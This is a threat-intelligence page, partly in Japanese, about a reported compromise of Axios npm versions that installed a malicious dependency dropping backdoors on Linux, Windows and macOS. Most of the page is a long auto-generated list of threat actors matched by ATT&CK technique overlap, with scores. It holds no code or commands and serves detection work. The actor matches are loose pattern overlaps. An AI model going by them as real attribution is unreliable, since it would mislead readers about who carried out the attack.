Trusted Design

Detections for the Axios supply chain compromise

概要

A supply chain attack targeting Axios npm package versions 1.14.1 and 0.30.4 introduced a malicious transitive dependency (plain-crypto-js@4.2.1) that executed during installation. The attack deploys cross-platform payloads across Linux, Windows, and macOS through a consistent pattern: Node.js spawns OS-native shells to retrieve and execute remote payloads in detached or hidden contexts. Linux victims receive a Python-based RAT, Windows systems get a PowerShell backdoor with registry persistence, and macOS hosts are compromised with a Mach-O binary backdoor. All variants beacon to the same C2 infrastructure, performing host fingerprinting, process enumeration, filesystem reconnaissance, and arbitrary code execution. The malicious activity is reliably detected through behavioral signatures focusing on unusual Node.js process ancestry and remote payload retrieval rather than static indicators.

Created: 2026-05-07

Indicators

類似Pulses

類似するPulseは見つかりませんでした。

このPulseに関連する脅威アクター (事実ベース)

HAFNIUM

Score: 9.43
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1099 - Timestomp
  • T1590.006 - Network Security Appliances
  • T1049 - System Network Connections Discovery
MITREへのリンク →

menuPass

Score: 18.53
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1527 - Application Access Token
  • T1106 - Native API
  • T1098.007 - Additional Local or Domain Groups
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
MITREへのリンク →

Wizard Spider

Score: 17.20
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1083 - File and Directory Discovery
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1601.001 - Patch System Image
MITREへのリンク →

APT33

Score: 4.12
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1051 - Shared Webroot
MITREへのリンク →

Fox Kitten

Score: 11.61
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1177 - LSASS Driver
  • T1055.013 - Process Doppelgänging
  • T1051 - Shared Webroot
  • T1601.001 - Patch System Image
MITREへのリンク →

Volt Typhoon

Score: 37.73
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1099 - Timestomp
  • T1686.003 - Windows Host Firewall
  • T1003.007 - Proc Filesystem
  • T1547.005 - Security Support Provider
  • T1590.006 - Network Security Appliances
  • T1083 - File and Directory Discovery
  • T1055.004 - Asynchronous Procedure Call
  • T1049 - System Network Connections Discovery
  • T1488 - Disk Content Wipe
  • T1584.002 - DNS Server
  • T1546.016 - Installer Packages
  • T1665 - Hide Infrastructure
MITREへのリンク →

APT1

Score: 11.13
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1003.007 - Proc Filesystem
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
MITREへのリンク →

Mustang Panda

Score: 27.69
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1169 - Sudo
  • T1136.003 - Cloud Account
  • T1055.005 - Thread Local Storage
MITREへのリンク →

Play

Score: 6.72
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1590.006 - Network Security Appliances
  • T1597 - Search Closed Sources
  • T1601.001 - Patch System Image
MITREへのリンク →

Chimera

Score: 16.74
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1003.007 - Proc Filesystem
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1601.001 - Patch System Image
  • T1665 - Hide Infrastructure
MITREへのリンク →

Sea Turtle

Score: 6.73
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1063 - Security Software Discovery
  • T1098.007 - Additional Local or Domain Groups
MITREへのリンク →

APT39

Score: 13.74
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1547.011 - Plist Modification
  • T1055.013 - Process Doppelgänging
  • T1087.004 - Cloud Account
  • T1027.004 - Compile After Delivery
MITREへのリンク →

RedCurl

Score: 17.21
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1016.002 - Wi-Fi Discovery
  • T1090 - Proxy
  • T1051 - Shared Webroot
  • T1027.004 - Compile After Delivery
  • T1055.009 - Proc Memory
MITREへのリンク →

APT5

Score: 13.09
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1106 - Native API
  • T1578.003 - Delete Cloud Instance
  • T1055.004 - Asynchronous Procedure Call
MITREへのリンク →

Agrius

Score: 7.96
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
MITREへのリンク →

GALLIUM

Score: 15.26
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1059.004 - Unix Shell
MITREへのリンク →

APT41

Score: 26.77
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1106 - Native API
  • T1590.006 - Network Security Appliances
  • T1177 - LSASS Driver
  • T1578.003 - Delete Cloud Instance
  • T1055.004 - Asynchronous Procedure Call
  • T1027 - Obfuscated Files or Information
  • T1564.003 - Hidden Window
MITREへのリンク →

MuddyWater

Score: 27.99
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1546.013 - PowerShell Profile
  • T1547.012 - Print Processors
  • T1518.002 - Backup Software Discovery
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1051 - Shared Webroot
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image
MITREへのリンク →

APT28

Score: 16.43
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1222.002 - Linux and Mac Permissions
  • T1098.007 - Additional Local or Domain Groups
  • T1131 - Authentication Package
  • T1547.011 - Plist Modification
  • T1200 - Hardware Additions
MITREへのリンク →

Turla

Score: 30.93
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1546.013 - PowerShell Profile
  • T1099 - Timestomp
  • T1063 - Security Software Discovery
  • T1003.007 - Proc Filesystem
  • T1131 - Authentication Package
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1597 - Search Closed Sources
  • T1059.004 - Unix Shell
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image
  • T1546.016 - Installer Packages
MITREへのリンク →

BRONZE BUTLER

Score: 12.10
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1003.007 - Proc Filesystem
  • T1592.004 - Client Configurations
  • T1597 - Search Closed Sources
  • T1027.004 - Compile After Delivery
MITREへのリンク →

UNC3886

Score: 16.86
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1021.006 - Windows Remote Management
  • T1597 - Search Closed Sources
  • T1059.004 - Unix Shell
  • T1488 - Disk Content Wipe
  • T1027.004 - Compile After Delivery
MITREへのリンク →

Kimsuky

Score: 39.40
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1546.013 - PowerShell Profile
  • T1213.006 - Databases
  • T1003.007 - Proc Filesystem
  • T1098.007 - Additional Local or Domain Groups
  • T1131 - Authentication Package
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1051 - Shared Webroot
  • T1654 - Log Enumeration
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1027.014 - Polymorphic Code
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image
  • T1665 - Hide Infrastructure
MITREへのリンク →

APT3

Score: 18.48
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1177 - LSASS Driver
  • T1055.004 - Asynchronous Procedure Call
  • T1051 - Shared Webroot
  • T1087.004 - Cloud Account
  • T1059.004 - Unix Shell
MITREへのリンク →

FIN8

Score: 8.54
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1099 - Timestomp
  • T1027 - Obfuscated Files or Information
  • T1601.001 - Patch System Image
MITREへのリンク →

Ke3chang

Score: 24.80
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1003.007 - Proc Filesystem
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1198 - SIP and Trust Provider Hijacking
  • T1090 - Proxy
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
MITREへのリンク →

Lotus Blossom

Score: 7.54
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1099 - Timestomp
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
MITREへのリンク →

FIN13

Score: 19.72
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1099 - Timestomp
  • T1584.008 - Network Devices
  • T1547.005 - Security Support Provider
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1051 - Shared Webroot
  • T1134.001 - Token Impersonation/Theft
MITREへのリンク →

Earth Lusca

Score: 15.99
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1546.013 - PowerShell Profile
  • T1003.007 - Proc Filesystem
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1027.004 - Compile After Delivery
  • T1546.016 - Installer Packages
MITREへのリンク →

Magic Hound

Score: 26.93
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1099 - Timestomp
  • T1106 - Native API
  • T1098.007 - Additional Local or Domain Groups
  • T1016.002 - Wi-Fi Discovery
  • T1547.005 - Security Support Provider
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1601.001 - Patch System Image
MITREへのリンク →

Aquatic Panda

Score: 10.81
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1003.007 - Proc Filesystem
  • T1106 - Native API
  • T1597 - Search Closed Sources
  • T1601.001 - Patch System Image
MITREへのリンク →

INC Ransom

Score: 14.93
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1083 - File and Directory Discovery
  • T1055.004 - Asynchronous Procedure Call
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1055.009 - Proc Memory
MITREへのリンク →

Akira

Score: 10.27
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1137.005 - Outlook Rules
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

ToddyCat

Score: 6.16
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1055.004 - Asynchronous Procedure Call
  • T1665 - Hide Infrastructure
MITREへのリンク →

APT29

Score: 30.07
Matched TTPs:
  • T1222.002 - Linux and Mac Permissions
  • T1099 - Timestomp
  • T1584.008 - Network Devices
  • T1202 - Indirect Command Execution
  • T1547.011 - Plist Modification
  • T1177 - LSASS Driver
  • T1592.004 - Client Configurations
  • T1556.008 - Network Provider DLL
  • T1027.004 - Compile After Delivery
MITREへのリンク →

APT32

Score: 25.68
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1131 - Authentication Package
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1592.004 - Client Configurations
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1027.014 - Polymorphic Code
  • T1601.001 - Patch System Image
MITREへのリンク →

Saint Bear

Score: 6.11
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1055.013 - Process Doppelgänging
  • T1597 - Search Closed Sources
MITREへのリンク →

FIN6

Score: 11.60
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1063 - Security Software Discovery
  • T1055.013 - Process Doppelgänging
  • T1597 - Search Closed Sources
  • T1601.001 - Patch System Image
MITREへのリンク →

Sidewinder

Score: 8.59
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1590.006 - Network Security Appliances
  • T1090 - Proxy
  • T1601.001 - Patch System Image
MITREへのリンク →

Winter Vivern

Score: 11.09
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1055.013 - Process Doppelgänging
  • T1090 - Proxy
  • T1087.004 - Cloud Account
MITREへのリンク →

Silence

Score: 6.58
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1547.011 - Plist Modification
  • T1601.001 - Patch System Image
MITREへのリンク →

Contagious Interview

Score: 28.64
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1131 - Authentication Package
  • T1021.006 - Windows Remote Management
  • T1183 - Image File Execution Options Injection
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image
  • T1651 - Cloud Administration Command
MITREへのリンク →

LazyScripter

Score: 8.10
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1098.007 - Additional Local or Domain Groups
  • T1601.001 - Patch System Image
MITREへのリンク →

TA505

Score: 19.48
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1527 - Application Access Token
  • T1098.007 - Additional Local or Domain Groups
  • T1016.002 - Wi-Fi Discovery
  • T1051 - Shared Webroot
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1601.001 - Patch System Image
MITREへのリンク →

FIN7

Score: 12.78
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1098.007 - Additional Local or Domain Groups
  • T1055.013 - Process Doppelgänging
  • T1027 - Obfuscated Files or Information
  • T1601.001 - Patch System Image
MITREへのリンク →

Cobalt Group

Score: 18.00
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1518.002 - Backup Software Discovery
  • T1598.004 - Spearphishing Voice
  • T1027.014 - Polymorphic Code
  • T1601.001 - Patch System Image
MITREへのリンク →

Higaisa

Score: 8.25
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1590.006 - Network Security Appliances
  • T1087.004 - Cloud Account
  • T1665 - Hide Infrastructure
MITREへのリンク →

Indrik Spider

Score: 16.28
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1003.007 - Proc Filesystem
  • T1183 - Image File Execution Options Injection
  • T1051 - Shared Webroot
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1546.016 - Installer Packages
MITREへのリンク →

Leafminer

Score: 6.36
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1051 - Shared Webroot
  • T1601.001 - Patch System Image
MITREへのリンク →

Star Blizzard

Score: 8.71
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1183 - Image File Execution Options Injection
MITREへのリンク →

HEXANE

Score: 14.55
Matched TTPs:
  • T1099 - Timestomp
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1601.001 - Patch System Image
MITREへのリンク →

Gamaredon Group

Score: 28.16
Matched TTPs:
  • T1099 - Timestomp
  • T1527 - Application Access Token
  • T1547.012 - Print Processors
  • T1098.007 - Additional Local or Domain Groups
  • T1090 - Proxy
  • T1087.004 - Cloud Account
  • T1554 - Compromise Host Software Binary
  • T1597 - Search Closed Sources
  • T1601.001 - Patch System Image
  • T1200 - Hardware Additions
MITREへのリンク →

TA2541

Score: 6.06
Matched TTPs:
  • T1099 - Timestomp
  • T1098.007 - Additional Local or Domain Groups
  • T1597 - Search Closed Sources
MITREへのリンク →

Mustard Tempest

Score: 4.54
Matched TTPs:
  • T1682 - Query Public AI Services
MITREへのリンク →

Daggerfly

Score: 9.27
Matched TTPs:
  • T1584.008 - Network Devices
  • T1530 - Data from Cloud Storage
  • T1546.016 - Installer Packages
MITREへのリンク →

Dragonfly

Score: 24.51
Matched TTPs:
  • T1584.008 - Network Devices
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1654 - Log Enumeration
  • T1531 - Account Access Removal
  • T1027.004 - Compile After Delivery
  • T1200 - Hardware Additions
  • T1546.016 - Installer Packages
MITREへのリンク →

Threat Group-3390

Score: 7.31
Matched TTPs:
  • T1584.008 - Network Devices
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
MITREへのリンク →

Ember Bear

Score: 9.66
Matched TTPs:
  • T1584.008 - Network Devices
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1051 - Shared Webroot
  • T1597 - Search Closed Sources
MITREへのリンク →

OilRig

Score: 22.54
Matched TTPs:
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1003.007 - Proc Filesystem
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1055.004 - Asynchronous Procedure Call
  • T1051 - Shared Webroot
  • T1059.004 - Unix Shell
  • T1592.002 - Software
MITREへのリンク →

Tropic Trooper

Score: 19.35
Matched TTPs:
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1590.006 - Network Security Appliances
  • T1090 - Proxy
  • T1055.004 - Asynchronous Procedure Call
  • T1136.003 - Cloud Account
  • T1200 - Hardware Additions
  • T1665 - Hide Infrastructure
MITREへのリンク →

Scattered Spider

Score: 29.99
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1590.006 - Network Security Appliances
  • T1083 - File and Directory Discovery
  • T1051 - Shared Webroot
  • T1087.004 - Cloud Account
  • T1556.008 - Network Provider DLL
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1564.003 - Hidden Window
MITREへのリンク →

Storm-0501

Score: 16.91
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1686.003 - Windows Host Firewall
  • T1027 - Obfuscated Files or Information
  • T1027.014 - Polymorphic Code
  • T1055.009 - Proc Memory
MITREへのリンク →

Sandworm Team

Score: 37.93
Matched TTPs:
  • T1063 - Security Software Discovery
  • T1484.002 - Trust Modification
  • T1686.003 - Windows Host Firewall
  • T1098.007 - Additional Local or Domain Groups
  • T1016.002 - Wi-Fi Discovery
  • T1183 - Image File Execution Options Injection
  • T1055.004 - Asynchronous Procedure Call
  • T1049 - System Network Connections Discovery
  • T1087.004 - Cloud Account
  • T1027 - Obfuscated Files or Information
  • T1075 - Pass the Hash
  • T1601.001 - Patch System Image
  • T1546.016 - Installer Packages
MITREへのリンク →

Leviathan

Score: 23.47
Matched TTPs:
  • T1484.002 - Trust Modification
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
  • T1087.004 - Cloud Account
  • T1554 - Compromise Host Software Binary
  • T1027.014 - Polymorphic Code
  • T1488 - Disk Content Wipe
  • T1546.016 - Installer Packages
MITREへのリンク →

Medusa Group

Score: 16.64
Matched TTPs:
  • T1547.012 - Print Processors
  • T1106 - Native API
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1601.001 - Patch System Image
MITREへのリンク →

TeamTNT

Score: 17.43
Matched TTPs:
  • T1003.007 - Proc Filesystem
  • T1106 - Native API
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1051 - Shared Webroot
  • T1597 - Search Closed Sources
  • T1665 - Hide Infrastructure
MITREへのリンク →

Poseidon Group

Score: 4.26
Matched TTPs:
  • T1003.007 - Proc Filesystem
  • T1055.004 - Asynchronous Procedure Call
MITREへのリンク →

admin@338

Score: 5.73
Matched TTPs:
  • T1003.007 - Proc Filesystem
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
MITREへのリンク →

PROMETHIUM

Score: 3.84
Matched TTPs:
  • T1530 - Data from Cloud Storage
MITREへのリンク →

Patchwork

Score: 11.69
Matched TTPs:
  • T1530 - Data from Cloud Storage
  • T1059.004 - Unix Shell
  • T1601.001 - Patch System Image
  • T1665 - Hide Infrastructure
MITREへのリンク →

Lazarus Group

Score: 30.90
Matched TTPs:
  • T1106 - Native API
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1069.001 - Local Groups
  • T1597 - Search Closed Sources
  • T1546.016 - Installer Packages
  • T1055.005 - Thread Local Storage
  • T1665 - Hide Infrastructure
MITREへのリンク →

Storm-1811

Score: 8.40
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1027 - Obfuscated Files or Information
  • T1486 - Data Encrypted for Impact
MITREへのリンク →

APT42

Score: 5.27
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
MITREへのリンク →

ZIRCONIUM

Score: 7.30
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1087.004 - Cloud Account
  • T1027.004 - Compile After Delivery
MITREへのリンク →

EXOTIC LILY

Score: 3.80
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
MITREへのリンク →

Silent Librarian

Score: 3.80
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
MITREへのリンク →

APT38

Score: 16.47
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1055.004 - Asynchronous Procedure Call
  • T1590 - Gather Victim Network Information
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1493 - Transmitted Data Manipulation
MITREへのリンク →

Moonstone Sleet

Score: 7.61
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

CURIUM

Score: 5.78
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
  • T1087.004 - Cloud Account
MITREへのリンク →

LAPSUS$

Score: 10.62
Matched TTPs:
  • T1547.005 - Security Support Provider
  • T1556.008 - Network Provider DLL
  • T1564.003 - Hidden Window
MITREへのリンク →

SilverTerrier

Score: 3.29
Matched TTPs:
  • T1131 - Authentication Package
MITREへのリンク →

FIN5

Score: 5.09
Matched TTPs:
  • T1547.011 - Plist Modification
  • T1055.013 - Process Doppelgänging
MITREへのリンク →

Tonto Team

Score: 5.09
Matched TTPs:
  • T1547.011 - Plist Modification
  • T1027.004 - Compile After Delivery
MITREへのリンク →

BlackByte

Score: 11.71
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1134.001 - Token Impersonation/Theft
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

APT19

Score: 8.42
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1027.014 - Polymorphic Code
  • T1601.001 - Patch System Image
MITREへのリンク →

SideCopy

Score: 5.60
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1584.002 - DNS Server
MITREへのリンク →

Stealth Falcon

Score: 5.78
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1087.004 - Cloud Account
MITREへのリンク →

Deep Panda

Score: 9.18
Matched TTPs:
  • T1177 - LSASS Driver
  • T1059.004 - Unix Shell
  • T1027.014 - Polymorphic Code
MITREへのリンク →

Axiom

Score: 6.91
Matched TTPs:
  • T1177 - LSASS Driver
  • T1049 - System Network Connections Discovery
MITREへのリンク →

APT37

Score: 8.81
Matched TTPs:
  • T1055.013 - Process Doppelgänging
  • T1078 - Valid Accounts
  • T1027.004 - Compile After Delivery
MITREへのリンク →

Velvet Ant

Score: 3.53
Matched TTPs:
  • T1055.004 - Asynchronous Procedure Call
  • T1597 - Search Closed Sources
MITREへのリンク →

Confucius

Score: 7.96
Matched TTPs:
  • T1087.004 - Cloud Account
  • T1200 - Hardware Additions
  • T1665 - Hide Infrastructure
MITREへのリンク →

Rocke

Score: 4.14
Matched TTPs:
  • T1597 - Search Closed Sources
  • T1027.004 - Compile After Delivery
MITREへのリンク →

Windshift

Score: 4.13
Matched TTPs:
  • T1078 - Valid Accounts
MITREへのリンク →

DarkHydrus

Score: 7.28
Matched TTPs:
  • T1531 - Account Access Removal
  • T1200 - Hardware Additions
MITREへのリンク →

TA551

Score: 4.61
Matched TTPs:
  • T1027.014 - Polymorphic Code
  • T1601.001 - Patch System Image
MITREへのリンク →

Inception

Score: 5.90
Matched TTPs:
  • T1027.014 - Polymorphic Code
  • T1200 - Hardware Additions
MITREへのリンク →

DarkVishnya

Score: 4.54
Matched TTPs:
  • T1213.003 - Code Repositories
MITREへのリンク →

このPulseに関連する脅威アクター (推論ベース)

Kimsuky

Score: 0.70
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1183 - Image File Execution Options Injection
  • T1027.004 - Compile After Delivery
  • T1597 - Search Closed Sources
  • T1087.004 - Cloud Account
  • T1601.001 - Patch System Image
  • T1213.006 - Databases
  • T1560.001 - Archive via Utility
  • T1098.007 - Additional Local or Domain Groups
  • T1051 - Shared Webroot
  • T1003.007 - Proc Filesystem
  • T1546.013 - PowerShell Profile
  • T1654 - Log Enumeration
  • T1665 - Hide Infrastructure
  • T1027.014 - Polymorphic Code
  • T1131 - Authentication Package
MITREへのリンク →

Sandworm Team

Score: 0.67
Matched TTPs:
  • T1183 - Image File Execution Options Injection
  • T1055.004 - Asynchronous Procedure Call
  • T1063 - Security Software Discovery
  • T1484.002 - Trust Modification
  • T1049 - System Network Connections Discovery
  • T1087.004 - Cloud Account
  • T1686.003 - Windows Host Firewall
  • T1075 - Pass the Hash
  • T1027 - Obfuscated Files or Information
  • T1601.001 - Patch System Image
  • T1098.007 - Additional Local or Domain Groups
  • T1016.002 - Wi-Fi Discovery
  • T1546.016 - Installer Packages
MITREへのリンク →

Volt Typhoon

Score: 0.67
Matched TTPs:
  • T1547.005 - Security Support Provider
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1099 - Timestomp
  • T1049 - System Network Connections Discovery
  • T1083 - File and Directory Discovery
  • T1686.003 - Windows Host Firewall
  • T1560.001 - Archive via Utility
  • T1488 - Disk Content Wipe
  • T1584.002 - DNS Server
  • T1003.007 - Proc Filesystem
  • T1546.016 - Installer Packages
  • T1665 - Hide Infrastructure
MITREへのリンク →

Related CVEs

このPulseに見つかったCVEはありません。

Pulse – 脅威アクター グラフ

← Pulse一覧に戻る